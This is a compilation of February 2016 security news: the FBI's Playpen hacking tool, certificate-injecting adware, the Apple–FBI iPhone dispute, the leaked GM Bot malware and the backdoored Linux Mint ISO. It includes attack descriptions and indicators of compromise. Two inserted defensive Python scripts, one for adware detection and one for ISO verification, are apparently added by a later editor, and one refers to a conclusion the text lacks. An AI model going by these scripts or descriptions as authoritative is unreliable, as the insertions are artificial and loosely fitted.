Fieman is defending Jay Michaud, a Vancouver public schools administration worker arrested after the FBI seized Playpen, a popular child pornography site hosted on the dark web, and deployed a network investigative technique (NIT), the agency’s term for a hacking tool, against its visitors.

The use of the NIT was confirmed earlier this year, when court documents reviewed by Motherboard showed that the FBI had used it to identify suspects browsing the Tor network.

The network investigative technique (NIT) got the suspects’ real IP address, the MAC address and other pieces of information and sent them to the FBI machines.

In July, at least two individuals from New York have been charged with online child pornography crimes after visiting a hidden service on the Tor network.

According to the court documents, the FBI monitored a bulletin board hidden service launched in August 2014, named Playpen, mainly used for “the advertisement and distribution of child pornography.” The FBI was able to harvest around 1300 IPs, and until the moment 137 people have been charged. The network investigative technique used by the FBI included computers in the UK, Chile and Greece.

In January, a report published by the Washington Post confirmed that in the summer of 2013 Feds hacked the TorMail service by injecting the NIT code in the mail page in the attempt to track its users.

The problem is that the FBI used only one warrant to hack computers of unknown suspects all over the world. The defense also argues that the FBI left the child pornography site running in order to be able to do the network investigative technique.

Last month a judge rules that the FBI’s actions did not constitute “outrageous conduct.”, but now a new order got out and obligates the FBI to disclose all the code components used in the network investigative technique.

Michaud’s lawyers were trying to get access to the technique and code used by the FBI since September but it wasn’t until January that Vlad Tsyrklevitch (the defense’s consulted expert) received the discovery.

Tsyrklevitch now argues that the provided code was incomplete, missing several parts. Part of the missing code is the one that identifies Michaud PC. Tsyrklevitch also claimed that part of the code missing is the exploit used to break into machines.

“This component is essential to understanding whether there were other components that the Government caused to run on Mr. Michaud’s computer, beyond the one payload that the Government has provided,” Michaud’s lawyers wrote,

Tormail Network investigative technique

It is not the first time that judges requested FBI to disclose the code used in hacking operations. In 2012, a case called Operation Torpedo the FBI disclosed the details a Metasploit module used for their investigation.

Wired revealed that the law enforcement relied on the popular Metasploit framework to first de-anonymize operators of child porn websites in the Tor network.

“Now Metasploit has a new and surprising fan: the FBI. WIRED has learned that FBI agents relied on Flash code from an abandoned Metasploit side project called the “Decloaking Engine” to stage its first known effort to successfully identify a multitude of suspects hiding behind the Tor anonymity network.” states the reportpublished by Wired.

The Operation Tornado was revealed when the FBI seized three child porn sites on Tor based in Nebraska. The FBI, authorized by a special search warrant crafted by Justice Department lawyers in Washington, DC, delivered the tracking Flash code do de-anonymous visitors. The operation allowed the FBI to identify at least 25 users in the US and many others in foreign countries.

There is no doubt, cases like this one will be even more frequent and it’s possible that in the future more court order will obligate to disclose all the information about a “target”.


On Download.com and elsewhere you can pick up crapware that breaks HTTPS

22.2.2016 Source: Lupa.cz Incidents

You don’t even need a Lenovo to get Superfish-style crapware or badware onto your computer. Downloading software from something like Download.com is enough. If you remember the affair with the Superfish software preinstalled on Lenovo notebooks, you can guess that there are strange ideas out there that put dangerous software on your computer, software that breaks encrypted (HTTPS) connections and opens the door to MITM (Man In The Middle) attacks, snooping and other risks.

It basically works like this: a bogus root certificate is installed on your (Windows) computer and HTTPS traffic is routed through a local proxy that re-signs every site’s certificate with that root, so the browser sees every connection as valid. In the case of the software called Superfish it was, moreover, done so amateurishly (the same private key shipped on every machine and was quickly extracted) that the hole was exploitable by anyone with malicious intent.

The same scheme is used by adware which, once deployed on your computer, redirects all HTTP/HTTPS traffic so that it can insert its own advertisements into pages. There are a number of similar “solutions” on the “market”, for example Wajam, GeniusBox and Content Explorer. They add their own certificate to the computer and then read and modify all communication.

As Howtogeek.com points out, you can catch something similar by downloading and installing software from Download.com where you would certainly not expect anything of the kind: in the top ten most downloaded applications they looked at, it was KMPlayer and YTD Video Downloader, but those are not the only cases.

The green button

According to Howtogeek.com it is not at all certain whether the originator of this infection is CNET and its Download.com, or whether the adware/malware is supplied directly by the program authors. In a number of historical cases, programs “enriched” this way actually came from the same company or individual, merely hiding outwardly behind different names and brands.

KMPlayer, for example, contains the above-mentioned Wajam, and both CNET and the KMPlayer maker can fairly easily wriggle out of any criticism: the installation of Wajam is not hidden, and the user is asked whether they want to install it. Which usually leads to them pressing the green Accept button instead of the correct orange Decline.

The purpose of these modifications is of course that you are served advertising in places where it normally would not be. The attack on encrypted connections has a clear reason: most important services and websites run over HTTPS today. In earlier times it was enough for such software to take control of the unencrypted connection.

The fundamental problem is that the program completely disables any checking of certificate validity, and with it any genuinely secure HTTPS communication.

How to detect that you have something like this on your computer?

Apart from symptoms such as odd advertisements in places where they do not usually appear, it is fairly hard to tell at first glance that something like this has got onto your computer. It is worth looking at the Internet connection settings, because a connection through a local proxy (often 127.0.0.1) may be enabled there.

You can try running netstat on the command line, where you can also see odd connections over the local interface. Running it as administrator and using netstat -b helps identify the programs the connections belong to. If the IP addresses puzzle you, netstat -f helps by converting them to domain names (where possible).

Relying on your antivirus to find adware/crapware is usually fairly futile; they detect it very rarely, because they do not consider it a virus. Anti-malware tools such as PC Decrapifier, Kaspersky TDSSKiller, Trojan Killer, HitmanPro 3 or Malwarebytes Anti-Malware can help (I use the last two fairly often, with good results).

It is also worth looking at the certificates you have in Windows (but beware, they can also sit in the browsers’ own certificate stores). Just open MMC (Microsoft Management Console) with the Certificates snap-in added and choose Computer account. After adding it, you are interested in “Trusted Root Certification Authorities”, but there is one fundamental shortcoming: there are really a lot of them and recognising the fraudulent ones is not easy. It helps a little that the most commonly used names are known: Sendori, Purelead, Rocket Tab, Super Fish, Lookthisup, Pando, Wajam, WajaNEnhance, DO_NOT_TRUST_FiddlerRoot, System Alerts, CE_UmbrellaCert.

You can also try one of the online tests (for example superfish.tlsfun.de) that check whether some of the planted certificates are on your computer. But beware: not finding a problem does not mean you are not infected.

And don’t forget that antivirus programs install a MITM just like these fraudulent programs do. If you have entrusted your antivirus program with inspecting your web traffic, that was definitely not the best idea.
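The checks described above (a local proxy on 127.0.0.1, netstat -b to see which program owns it, and a scan of the trusted-root store for the listed CA names) can be scripted. The following Python is an added example written for this page, not a tool from the article or from Howtogeek.com: it parses the output of netstat -a -n -o -b (a constructed sample is embedded), flags browser connections that terminate at a loopback listener owned by another process, and searches certificate subjects for the CA names listed above. The sample output, the process name adware_proxy.exe and the sample subjects are constructed; on Windows, windows_root_store() pulls the real DER blobs of the machine’s trusted roots through ssl.enum_certificates.

```python
"""Detect HTTPS-intercepting adware on Windows: local proxy + planted root CA.
Added example for this page (standard library only); netstat sample and names are constructed."""
import re
import ssl
import sys

# Root-CA names the article lists as the usual offenders, plus the spelling Superfish actually used.
SUSPECT_CA_NAMES = [
    "Sendori", "Purelead", "Rocket Tab", "Super Fish", "Superfish", "Lookthisup",
    "Pando", "Wajam", "WajaNEnhance", "DO_NOT_TRUST_FiddlerRoot", "System Alerts",
    "CE_UmbrellaCert",
]

BROWSERS = ("chrome.exe", "firefox.exe", "iexplore.exe", "microsoftedge.exe", "opera.exe")

# Constructed 'netstat -a -n -o -b' output (run as administrator); adware_proxy.exe is hypothetical.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       928
 [svchost.exe]
  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING       3320
 [adware_proxy.exe]
  TCP    127.0.0.1:49763        127.0.0.1:8080         ESTABLISHED     5124
 [chrome.exe]
  TCP    127.0.0.1:8080         127.0.0.1:49763        ESTABLISHED     3320
 [adware_proxy.exe]
  TCP    192.168.1.10:49770     203.0.113.5:443        ESTABLISHED     3320
 [adware_proxy.exe]
  UDP    0.0.0.0:5353           *:*                                    1680
 [mDNSResponder.exe]
"""

# proto, local addr, local port, foreign addr, foreign port, optional state (UDP has none), PID
ENTRY = re.compile(r"^(TCP|UDP)\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)(?:\s+([A-Z_]+))?\s+(\d+)$")


def parse_netstat(text):
    """Turn netstat -b output into dicts. The owning program is printed in brackets on the
    line after each entry, so it is attached to the most recent entry."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        m = ENTRY.match(line)
        if m:
            proto, laddr, lport, raddr, rport, state, pid = m.groups()
            entries.append({"proto": proto, "laddr": laddr, "lport": lport, "raddr": raddr,
                            "rport": rport, "state": state, "pid": int(pid), "program": None})
        elif line.startswith("[") and line.endswith("]") and entries:
            entries[-1]["program"] = line[1:-1]
    return entries


def find_local_proxies(entries, browsers=BROWSERS):
    """A browser whose TCP connection ends at a loopback listener owned by a different process
    is being proxied locally, which is how these adware packages interpose on HTTPS.
    Returns sorted (browser, proxy program, proxy PID, proxy port) tuples."""
    listeners = {e["lport"]: e for e in entries
                 if e["proto"] == "TCP" and e["state"] == "LISTENING"
                 and e["laddr"] in ("127.0.0.1", "0.0.0.0", "[::1]", "[::]")}
    hits = set()
    for e in entries:
        if e["proto"] != "TCP" or e["raddr"] not in ("127.0.0.1", "[::1]"):
            continue
        listener = listeners.get(e["rport"])
        if listener and (e["program"] or "").lower() in browsers and listener["pid"] != e["pid"]:
            hits.add((e["program"], listener["program"], listener["pid"], int(e["rport"])))
    return sorted(hits)


def suspect_cas(certs, names=SUSPECT_CA_NAMES):
    """Flag certificates whose subject contains a known adware CA name.
    Accepts subject strings, or raw DER blobs: the CN is stored as plain ASCII/UTF-8 inside DER,
    so a substring search over the bytes is a cheap, dependency-free heuristic."""
    hits = []
    for cert in certs:
        text = cert.decode("latin-1") if isinstance(cert, bytes) else cert
        for name in names:
            if name.lower() in text.lower():
                hits.append((text if isinstance(cert, str) else "<DER blob>", name))
                break
    return hits


def windows_root_store():
    """DER blobs of the machine's trusted roots (Windows only; empty list elsewhere)."""
    if sys.platform != "win32":
        return []
    return [der for der, _encoding, _trust in ssl.enum_certificates("ROOT")]


if __name__ == "__main__":
    for browser, proxy, pid, port in find_local_proxies(parse_netstat(SAMPLE_NETSTAT)):
        print(f"{browser} is proxied through {proxy} (PID {pid}) on 127.0.0.1:{port}")
    for _subject, name in suspect_cas(windows_root_store()):
        print(f"suspect root CA in the machine store: {name}")
```

On a real machine, replace SAMPLE_NETSTAT with the captured output of netstat -a -n -o -b run from an elevated prompt; the loopback-listener test deliberately ignores a process talking to itself, so only a browser handed to a different process is reported. The name match is a heuristic: a clean hit still needs the certificate opened in MMC, and an empty result does not prove the machine is clean.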


Much ado about a PIN. What the fight between the FBI and Apple is really about

22.2.2016 Source: Lupa.cz Mobile

The FBI wants to get into the phone of the San Bernardino attacker, Apple refuses, the local police botched what they could, and the world wonders.
It is actually terribly simple and terribly complicated at the same time. The evil, ugly FBI is dragging Apple to court because the company refuses to let it into the phone of the San Bernardino attacker. On one side there is a terrorist whose phone the FBI needs to get into. It has a clear, logical reason and an essentially undeniable motivation.

On the other side stands Apple, which made the phone and which is convinced that customers’ privacy is customers’ privacy. It seemingly refuses to help the FBI, though here it is no longer that simple. What it definitely refuses is to create a backdoor into the iPhone; at least that is how Apple presents it, and other companies see it the same way and loudly support it. From the FBI and the US Department of Justice we hear that Apple is merely doing its marketing, but apart from Donald Trump they do not have much support on that point.

What is also interesting is that the local police in San Bernardino, on instructions from the FBI, made one of the more fundamental, even stupid, mistakes: they reset the iCloud password for that phone in an attempt to “gain access to the backups”. Had they not taken that step, there were at least four ways to get at the phone’s data. After the reset there are none, Apple points out.

Needless obstruction?

It all went so far that a federal judge ordered Apple to create a special version of iOS that would allow access to the phone. All this only because the San Bernardino attacker locked his phone with a PIN of a mere four digits. And also, let us recall, because somebody cleverly reset the iCloud password (which is a different password).

Apple refuses to comply with the court order, saying it would undermine customer trust and the security of Apple products. In all the confusion this might look like needless obstruction, but it probably is not. Above all: Apple has already handed the FBI the backups the attacker had in the cloud, so it is far from the case that Apple does not intend to cooperate (the only catch is that they date from October, six weeks before the attack, which took place on December 2).

But that is far from all. One way to obtain current data from the phone would have been simply to connect it to the Wi-Fi network on which backups usually took place; the phone would then have performed a fresh backup, provided that the iCloud password had not been changed/reset. For completeness, it should be added that it is not known whether the attacker turned backups off before the attack (as a security measure).

Apple cannot help with finding the PIN (more precisely, the passcode) used to lock the phone: it exists nowhere outside the phone, because iOS derives the encryption keys from the passcode together with a key fused into the device’s hardware, so there is nothing for Apple to look up. Nor can it help obtain information that is not backed up to iCloud. And there can be quite a lot of such information on the phone, especially if the San Bernardino attacker used some specific applications.

One specific phone

It is hard to find your way through this confusing mess. But common sense says that if it is possible to create a special iOS that, once loaded onto a locked phone, helps break the lock, then any locking is fairly pointless. The FBI, like the NSA and other organisations, has in the past had a range of tools that allowed it to hack (not only) the iPhone.

But here is another important piece of the puzzle: with the arrival of iOS 8 these tools stopped working. Apple, which bet on customer security, made changes that significantly limited what can be extracted from phones.

To make things less simple, let us add that besides the smartphone at issue, the attacker also used his own phone. The iPhone now in dispute is actually his employer’s phone. He destroyed his own phone before the attack, as well as the hard drive from the notebook he used.

The FBI argues that it only wants access to one specific model (the iPhone 5c) and claims that it is therefore really about nothing at all. But the fact that it is about the 5c now does not mean it will not want access to the iPhone 6 next time.

Backdoor

The most amusing thing about this case is that the FBI does not actually want such a special iOS. The investigators simply want help so that they can find the needed four-digit combination by trial and error.

They only need Apple to deactivate the wiping of the phone after ten incorrectly entered PIN codes. It is fairly obvious that Apple could certainly do something like that. But, as already hinted, it then means it can do it at any time and for any phone or tablet.

In addition, it would suit them if Apple could switch off the progressively lengthening interval between passcode attempts, but that is surely also possible. If the security measures could not be switched off, the FBI could be trying passcodes for years.

Apple logically and rightly stresses that such a “version” of iOS does not exist, because if it existed it would be a potential danger. It would only have to leak from the company.

How will it all end?

What outcome the legal battle between Apple and the FBI will have is not yet clear. What matters is that, however logical and “right” the demand to obtain information from the phone of someone who killed may be, there is no room for emotions here.

Allowing access to a device whose owner decided to protect his own data and information is a fundamental violation of privacy.

Apple (and not only Apple) is essentially pushing back against governments’ efforts to limit the availability of encryption and to secure backdoors for arbitrary purposes. But this short-sighted effort will in the end run into the fact that if someone really wants to hide something, they will do it in a way that avoids all backdoors. And the only ones who will bear the brunt of states’ attempts to limit privacy are people who are doing nothing wrong.


Source code of the Android GM Bot malware was leaked online
22.2.2016 Android

The experts at IBM X-Force threat intelligence have discovered that the source code for the Android malware GM Bot was leaked online.
Bad news for the Android community: the experts at IBM X-Force threat intelligence have discovered that the source code for the Android malware GM Bot was leaked on an underground forum. The code, leaked in December 2015, includes the bot component and the control panel.

It seems that one of GM Bot’s buyers decided to leak the code online to enhance his credibility on underground boards.

He leaked the code in an encrypted archive, then indicated he would give the password only to active forum members who contacted him.

Of course, the code rapidly spread within the criminal ecosystem; it is now freely available online, together with a tutorial and instructions for the server-side installation.

The availability of a malware’s source code online is a crucial moment in the life cycle of malicious code. Once the code is leaked, criminal organizations can build on it to create new variants that could be offered for sale or rent.

The original creator of the Android malware sold the rights to distribute GM Bot v1 (aka MazarBot) to other cyber criminal organizations, which are offering it for $500.

“According to X-Force threat intelligence, the code’s author moved on to working on a new version dubbed GM Bot v2.0, which is sold in financial fraud-themed underground boards.” states a blog post published by the X-Force threat intelligence.

GM Bot appeared in the wild in 2014; it was offered in the Russian underground as a powerful instrument for mobile phishing.

“This Android malware’s differentiating capability is its deployment of overlay screens on top of running banking applications, with the goal of tricking users into entering their access credentials into a fake window that will grab and forward them to a remote attacker.” continues the post.

The malware implements a number of features to target Android users, including intercepting SMS messages. It allows attackers to gain control of the targeted device, including the customization of the fake screens.

In short, mobile banking Trojans such as GM Bot are a one-stop fraud shop for criminals:

They launch fake overlay windows that mimic bank applications to steal user credentials and payment card details.
They control the device’s SMS relay to eavesdrop, intercept and send out SMS messages.
They can forward phone calls to a remote attacker.
They have spyware features and can control the device via remote commands.
The experts at IBM analyzed only the control panel, because many other organizations and security firms have already produced detailed analyses of the malware.

The most interesting feature discovered in GM Bot’s botnet administration panel is the ability to create and deploy new injections (overlay screens) to infected user devices.

Another interesting component of the botnet is the “Search and Stats” section, which allows operators to query their database of stolen information: credit card details, lists of apps installed on infected devices, victims’ bank accounts and other data.

Let me suggest taking a look at the interesting analysis published by IBM, which also includes the indicators of compromise.


Anonymous took down several government websites of Saudi Arabia

22.2.2016  Hacking

Anonymous launched a series of cyber attacks against government websites of Saudi Arabia to protest the execution of 47 people, including Sheikh Nimr Al Nimr.
The Anonymous collective is conducting a hacking campaign against the Saudi Arabian Government to protest the execution of 47 people.

On January 2nd, the Government announced the executions on terrorism charges; among those executed were Sheikh Nimr Al Nimr and the convicted al-Qaeda leader Faris al-Zahrani.

The executions raised tensions between Saudi Arabia and Iran, but the events also triggered the Anonymous response.

The attacks launched by Anonymous are part of the operations #OpSaudi and #OpNimr.

The #OpNimr campaign was launched in September 2015 to protest continuous violations of human rights; Anonymous targeted Saudi websites in response to the death sentence handed down to Ali al-Nimr, Sheikh Nimr’s nephew.
Ali al-Nimr was sentenced to death on 27 May 2014 for offences allegedly committed when he was 17 years old: taking part in demonstrations against the government, attacking the security forces, possessing a machine gun and armed robbery.
He is also accused of using a BlackBerry to encourage people to join the protests.

As explained by Amnesty International, the sentence is based on confessions extracted under torture. Members of Anonymous started their campaign calling for al-Nimr’s release, adding that he had been denied a lawyer and confirming the torture allegations.

The series of cyber attacks that recently targeted the Saudi Arabian Government took down the official websites of the Ministry of Defense, the Royal Saudi Air Force, the Ministry of Education, the Saudi Press Agency, the Saudi Customs Service, the Ministry of Finance, the Saudi Ombudsman’s Office and the General Passports Service.

The websites have since been restored.


Warning! — Linux Mint Website Hacked and ISOs replaced with Backdoored Operating System
21.2.2016 Hacking
Did you download Linux Mint on February 20th? You may have been infected!
Linux Mint is one of the best and most popular Linux distros available today, but if you have downloaded and installed the operating system recently, you might have done so using a malicious ISO image.
Here's why:
Last night, an unknown hacker or group of hackers managed to break into the Linux Mint website and replace the download links so that they pointed to a server of their own offering a malicious ISO image of the Linux Mint 17.3 Cinnamon Edition.
"Hackers made a modified Linux Mint ISO, with a backdoor in it, and managed to hack our website to point to it," the head of the Linux Mint project, Clement Lefebvre, said in a surprising announcement dated February 21, 2016.
Who is affected?
As far as the Linux Mint team knows, the issue affects only one edition, Linux Mint 17.3 Cinnamon.
The compromise happened last night, so it affects only people who downloaded that edition of Linux Mint on February 20th.
If you downloaded the Cinnamon edition before Saturday, February 20th, the issue does not affect you. It also does not affect you if you downloaded a different edition, or Mint 17.3 Cinnamon via torrent or a direct HTTP link.
What happened?
The hackers are believed to have gained access to the underlying server via the team's WordPress blog and obtained a shell as the www-data user.
From there, they manipulated the Linux Mint download page and pointed it to a malicious FTP (File Transfer Protocol) server hosted in Bulgaria (IP: 5.104.175.212), the investigative team discovered.
The infected ISO images install the complete OS together with the Internet Relay Chat (IRC) backdoor Tsunami, giving the attackers access to the system via IRC servers.
Tsunami is a well-known Linux ELF trojan, a simple IRC bot used for launching Distributed Denial of Service (DDoS) attacks.
Hackers vs. Linux Mint SysAdmins
The Linux Mint team discovered the hack, quickly cleaned up the links on its website and announced the breach on its official blog; it then appears that the hackers compromised the download page again.
Unable to pin down the hackers' exact point of entry, the Linux Mint team took the entire linuxmint.com domain offline to prevent the ISO images from spreading to its users.
The Linux Mint official website is currently offline until the team has investigated the issue fully. The hackers' motive is not clear yet.
"What we don't know is the motivation behind this attack. If more efforts are made to attack our project and if the goal is to hurt us, we'll get in touch with authorities and security firms to confront the people behind this," Lefebvre added.
Hackers Selling Linux Mint Website's Database
The hackers are offering the full Linux Mint website database for sale for just $85, which suggests a lack of sophistication.
The hack seems to be the work of script kiddies or an inexperienced group: they chose to infect a top-shelf Linux distro with a crude IRC bot that was already considered outdated in early 2010, rather than more dangerous malware such as banking Trojans.
Also, even after the hack was initially discovered, the hackers re-compromised the site, which again points to limited experience.
Here's How to Protect your Linux Machine
Users who still have the ISO image can check whether it is genuine.
To detect an infected download, compare the file's MD5 checksum with the official values included in Lefebvre's blog post.
If it turns out to be infected, users are advised to follow these steps:
Take the computer offline.
Back up all your personal data.
Reinstall the operating system (with a clean ISO) or format the partition.
Change passwords for sensitive websites and email accounts.
You can read the full details about the hack here. The official website is not accessible at the time of writing. We'll update the story when we hear more.


Utah systems experience 300 million hacking attacks a day due to the presence of the NSA Data Center
21.2.2016 Hacking

Representatives of the State of Utah confirmed that their systems experience 300 million hacking attacks a day due to the presence of the NSA Data Center.
The Utah state computer systems experience 300 million hacking attacks a day because of the NSA data center located in the state.

The Utah Data Center, also known as the Intelligence Community Comprehensive National Cybersecurity Initiative Data Center, is the mammoth data storage facility built by the NSA to store data gathered by US intelligence. Its official mission is classified; the plant is located at Camp Williams near Bluffdale, Utah.

Photo: the NSA’s Utah Data Center in Bluffdale, Utah, June 6, 2013 (AP Photo/Rick Bowmer).

Edward Snowden revealed that the project was initially known within the NSA as the Massive Data Repository, later renamed the Mission Data Repository.

NSA Utah Data Center Lightweight Security for Sparse Staff Unlike HQ Bloat
40°25’36.59″ N 111°55’57.92″ W pic.twitter.com/sdlLO0eJC5
— Cryptome (@Cryptomeorg) 20 February 2016

The presence of the data center attracts hackers, as explained by the Utah Commissioner of Public Safety, who confirmed a significant increase in the number of cyber attacks over the years.

“In 2010, my IT director was letting me know that the number of attacks we were averaging a day were between 25,000 to 80,000,” said Keith Squires, Utah Commissioner of Public Safety. “We had peaks in the past year or so that were over 300,000,000 a day.”

Hackers use botnets to scan the state’s computer systems, searching for vulnerable hosts.

“Although other states were seeing increases, most were not seeing anything like we were,” Squires said. “We didn’t realize it at first, but my opinion is in that same time, Utah was getting a lot of notoriety for the NSA facility that was being built here.”

The number of cyber attacks against the computer systems of other US states has also increased in recent years, but the trend observed for Utah is singular.

“The dynamics of Utah have changed,” the State of Utah’s Information Security Director told KUTV.

Utah hosts government entities and technology companies working in the intelligence and cyber security industries, which is why hackers consider its systems a privileged target.

The journalists at 2News interviewed Neil Wyler, a former hacker turned cyber security expert and consultant, asking him how hackers go about compromising government entities.

Wyler explained that hackers can target any system that offers a way into a US government system.

“To illustrate, he used a hypothetical example of a business that hackers could not penetrate, but they knew employees of the company liked to eat at a pizza place down the street. So the hackers infiltrated the pizza business website, spread pizza coupons at the firm that was their real target — encouraging workers to download a corrupted pizza “menu” — only to allow the hackers to troll the real target’s computers.” the 2News report explains.

Squires highlighted the strong security posture of the state’s critical infrastructure; facilities such as the NSA data center and the airport were designed for a high level of security, with “totally separate” networks.

But let me add that security is an instantaneous concept: what is safe at this moment might not be a few seconds later.


Linux Mint was hacked, website served malicious ISO on Saturday
21.2.2016 Hacking

The Linux Mint website was hacked on Saturday: intruders compromised it and served a malicious ISO of Linux Mint 17.3 Cinnamon edition.
The Linux Mint website was hacked on Saturday 20th February; intruders compromised the site and used it to serve a malicious ISO of Linux Mint 17.3 Cinnamon edition.

The disconcerting announcement was made by Clement Lefebvre, the head of the Linux Mint project. Lefebvre explained that the Linux Mint website had been compromised and that the hackers used it to distribute a malicious ISO of Linux Mint 17.3 Cinnamon edition.

“I’m sorry I have to come with bad news. We were exposed to an intrusion today. It was brief and it shouldn’t impact many people, but if it impacts you, it’s very important you read the information below.

What happened?

Hackers made a modified Linux Mint ISO, with a backdoor in it, and managed to hack our website to point to it.” wrote Clement Lefebvre.

Beware of hacked ISOs if you downloaded Linux Mint on February 20th! https://t.co/cexMF2USWS
— Linux Mint (@Linux_Mint) 21 February 2016

Users who downloaded Linux Mint 17.3 Cinnamon edition prior to Saturday, or any other version/flavour (including Mint 17.3 Cinnamon via torrent or direct HTTP link), are not affected.

The operators of the distribution’s website have since cleaned it up.

Lefebvre urges users to check the MD5 digest of downloaded ISOs in order to detect any modification of the legitimate image.

“If you still have the ISO file, check its MD5 signature with the command “md5sum yourfile.iso” (where yourfile.iso is the name of the ISO).” continues the post.

Below is the list of valid checksums:

6e7f7e03500747c6c3bfece2c9c8394f linuxmint-17.3-cinnamon-32bit.iso
e71a2aad8b58605e906dbea444dc4983 linuxmint-17.3-cinnamon-64bit.iso
30fef1aa1134c5f3778c77c4417f7238 linuxmint-17.3-cinnamon-nocodecs-32bit.iso
3406350a87c201cdca0927b1bc7c2ccd linuxmint-17.3-cinnamon-nocodecs-64bit.iso
df38af96e99726bb0a1ef3e5cd47563d linuxmint-17.3-cinnamon-oem-64bit.iso
“If you still have the burnt DVD or USB stick, boot a computer or a virtual machine offline (turn off your router if in doubt) with it and let it load the live session.

Once in the live session, if there is a file in /var/lib/man.cy, then this is an infected ISO.”

If you have an infected ISO, delete it, discard any discs used to burn it, and format any USB sticks it was written to.

If you have installed Linux Mint from an infected ISO, follow these steps:

Take the computer offline.
Back up personal data.
Reinstall the OS (with a clean ISO) or format the partition.
And change passwords to sites you used, especially email accounts.
Who is behind the attack?

The hacked ISOs are hosted on a server with the IP 5.104.175.212, and the backdoor connects to the absentvodka.com domain.

The IP and the domain used in the attack lead to three people located in Sofia, Bulgaria. Their roles in the attack are not clear.

“What we don’t know is the motivation behind this attack. If more efforts are made to attack our project and if the goal is to hurt us, we’ll get in touch with authorities and security firms to confront the people behind this.” added Clement Lefebvre.
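The checks Lefebvre describes above (the MD5 comparison and the /var/lib/man.cy marker), together with the earlier conclusion that a hash list served by the same website as the ISO proves nothing once that site is compromised, can be automated. The following Python script is an added example written for this page, not tooling from the Linux Mint project: it embeds the five MD5 sums quoted above, hashes a downloaded ISO in chunks, looks for the backdoor marker on a mounted ISO, live session or installed root, and, as the stronger check the conclusion asks for, verifies a detached OpenPGP signature on a checksum list by calling gpg. The file names sha256sum.txt and sha256sum.txt.gpg, the presence of gpg on the system and the key having been fetched independently of the website are assumptions.

```python
"""Verify a Linux Mint ISO download: hash check, backdoor marker, signed checksum list.
Added example for this page; not the Linux Mint project's own tooling."""
import hashlib
import os
import subprocess

# MD5 sums published by Clement Lefebvre for the clean 17.3 Cinnamon ISOs
# (copied from the announcement quoted above).
KNOWN_GOOD_MD5 = {
    "linuxmint-17.3-cinnamon-32bit.iso": "6e7f7e03500747c6c3bfece2c9c8394f",
    "linuxmint-17.3-cinnamon-64bit.iso": "e71a2aad8b58605e906dbea444dc4983",
    "linuxmint-17.3-cinnamon-nocodecs-32bit.iso": "30fef1aa1134c5f3778c77c4417f7238",
    "linuxmint-17.3-cinnamon-nocodecs-64bit.iso": "3406350a87c201cdca0927b1bc7c2ccd",
    "linuxmint-17.3-cinnamon-oem-64bit.iso": "df38af96e99726bb0a1ef3e5cd47563d",
}

# Path (relative to the root filesystem) of the backdoor source dropped by the tampered ISO.
BACKDOOR_MARKER = os.path.join("var", "lib", "man.cy")


def file_digest(path, algo="md5", chunk=1 << 20):
    """Hash a (possibly multi-GB) file in 1 MiB chunks; returns the lowercase hex digest."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def parse_sums(text):
    """Parse md5sum/sha256sum-style lines ('<digest>  <filename>') into {filename: digest}."""
    sums = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 2:
            digest, name = parts
            sums[name.lstrip("*")] = digest.lower()   # '*' marks binary mode in sum files
    return sums


def check_iso(path, known=KNOWN_GOOD_MD5, algo="md5"):
    """Compare an ISO against the published checksum for its file name.
    Returns ('ok' | 'mismatch' | 'unknown', actual digest or reason)."""
    expected = known.get(os.path.basename(path))
    if expected is None:
        return "unknown", "no published checksum for this file name"
    actual = file_digest(path, algo)
    return ("ok" if actual == expected.lower() else "mismatch"), actual


def has_backdoor_marker(root):
    """True if a mounted ISO, a live session or an installed system (root='/') carries /var/lib/man.cy."""
    return os.path.exists(os.path.join(root, BACKDOOR_MARKER))


def verify_signed_sums(sums_path, sig_path, keyring=None):
    """Verify the detached OpenPGP signature on a checksum list with gpg (assumed installed).
    A valid signature from the project's key, fetched independently of the website, is what a
    compromised download page cannot forge; a bare hash list can be edited along with the ISO."""
    cmd = ["gpg", "--verify", sig_path, sums_path]
    if keyring:
        cmd[1:1] = ["--no-default-keyring", "--keyring", keyring]
    return subprocess.run(cmd, capture_output=True).returncode == 0


if __name__ == "__main__":
    import sys
    iso = sys.argv[1] if len(sys.argv) > 1 else "linuxmint-17.3-cinnamon-64bit.iso"
    status, digest = check_iso(iso) if os.path.exists(iso) else ("missing", "")
    print(f"{iso}: {status} {digest}")
    # If a signed list is available (file names assumed), prefer it over the embedded MD5s.
    if os.path.exists("sha256sum.txt") and os.path.exists("sha256sum.txt.gpg"):
        if verify_signed_sums("sha256sum.txt", "sha256sum.txt.gpg"):
            with open("sha256sum.txt") as f:
                print("signed list:", check_iso(iso, parse_sums(f.read()), "sha256"))
        else:
            print("signature check FAILED: do not trust sha256sum.txt")
    print("backdoor marker on running system:", has_backdoor_marker("/"))
```

Run it as python verify_mint.py linuxmint-17.3-cinnamon-64bit.iso; to inspect an ISO without booting it, loop-mount the image (mount -o loop,ro file.iso /mnt) and call has_backdoor_marker("/mnt"). A mismatch tells you the file is not the one the project published; only the signed list tells you the list itself is authentic, which is the step the MD5 table on a hacked site cannot give you.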


San Bernardino shooter’s Apple ID passcode changed in government custody
21.2.2016 Apple

While discussing the San Bernardino shooter’s iPhone, Apple executives said the password changed while it was under the government custody.
The discussion about the San Bernardino shooter’s iPhone has monopolized media in this week, a US magistrate ordered Apple to help unlock the mobile device, but the company refused to do so.

A new shocking news is circulating on the Internet, according to unnamed Apple executives, the shooter’s Apple ID password changed while it was under government custody causing the block of the access.

The password associated with the Apple ID linked to the San Bernardino shooter’s iPhone was changed less than 24 hours after the feds took possession of the mobile device.

This circumstance made impossible to access a backup of the information the government was seeking.

According to Buzzfeed, the company executives revealed that Apple had been helping federal officials with the investigation when the password change was discovered.

According to Apple, it had been helping the FBI with the investigation since early January 2016, but it seems that the law enforcement contacted the company after attempting to access the iPhone.

“The executives said the company had been in regular discussions with the government since early January, and that it proposed four different ways to recover the information the government is interested in without building a backdoor. One of those methods would have involved connecting the iPhone to a known Wi-Fi network and triggering an iCloud backup that might provide the FBI with information stored to the device between the October 19th and the date of the incident.” states Buzzfeed.

